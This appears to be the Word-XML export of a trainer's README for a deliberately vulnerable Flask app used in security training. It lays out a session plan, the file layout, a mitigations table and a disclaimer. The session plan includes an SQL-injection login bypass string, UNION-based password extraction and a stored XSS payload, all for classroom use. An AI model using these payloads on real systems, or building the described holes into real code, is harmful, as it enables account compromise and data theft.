        <w:t xml:space="preserve">  "runtimeExecutable": "&lt;repo&gt;/vuln-demo/.venv/bin/python",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "runtimeArgs": ["&lt;repo&gt;/vuln-demo/app.py"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "port": 5050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You can then start it from inside Claude with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preview_start vuln-demo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unning-a-training-session"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Running a training session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Suggested order (each step takes ~10 minutes with discussion):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Tour the UI.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sign in as alice, post a benign comment, run a normal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">search. Show that the debug boxes echo the SQL.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SQLi auth bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(#3.1). Trainees try</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Open the source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app.py:login()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and read the f-string. Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log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grep sqli_suspected=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— show the audit trail.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UNION-based extraction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(#3.2). Trainees dump the password column.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tie this to vuln #3.4 (plaintext storage).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Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(#3.3). Trainees post</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">then a token-stealer using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Discuss persistence vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reflected XSS.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log forensics.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Hand them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">parse_logs.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the raw log,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ask them to identify which IPs ran SQLi, what payloads landed, what</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accounts got compromised.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Mitigations.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Walk through the fixes in section 8 and (if there’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">time) hand-edit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to fix one sink with parameterised SQL — the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">payload that worked five minutes ago now produces a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">login_failure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file-layout"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. File layout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vuln-demo/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── app.py              # Flask backend (vulnerable on purpose)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── requirements.txt    # Just Flask</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── README.md           # This file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── parse_logs.sh       # Bash summary of access.log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── access.log          # Created on first request (gitignore-able)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── vuln.db             # Created on first run (gitignore-able)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── static/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ├── index.html      # SPA shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ├── app.js          # Vanilla JS — uses innerHTML on comment bodies</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    └── style.css</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated artefacts (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vuln.db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access.log*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) are not tracked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and are regenerated automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="37" w:name="mitigations-to-discuss-after-the-demo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Mitigations to discuss after the demo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7"/>
        <w:gridCol w:w="59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 (login + search)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parameterised queries (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">db.execute("... WHERE username = ?", (username,))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XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Render with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. If HTML is required, sanitise with DOMPurify and apply a strict CSP.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passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hash with</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">argon2id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(preferred) or bcrypt; never store the plaintext.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Username-as-token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server-side session: signed cookie,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, short TTL.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CSRF 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SameSite=Lax</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">cookies + a per-form CSRF token, or rely on the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header.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Verbose error responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generic 500s for users; detailed error only in server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security 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Content-Security-Policy: default-src 'self'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Referrer-Policy: no-referrer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Audit-log gaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Add response status, request body size, request id, and forward to a SIEM (e.g. via Filebeat → Elasticsearch / Loki).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6" w:name="disclaimer"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This software is intended for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">authorised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">security training and is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">distributed without any warranty. Running it on a network you don’t own,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or against a system you’re not authorised to test, may be illegal. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">author and ShieldIQ Cyber accept no liability for misuse.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://127.0.0.1:505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127.0.0.1:505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2026-04-27T11:03:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-27T11:03:02Z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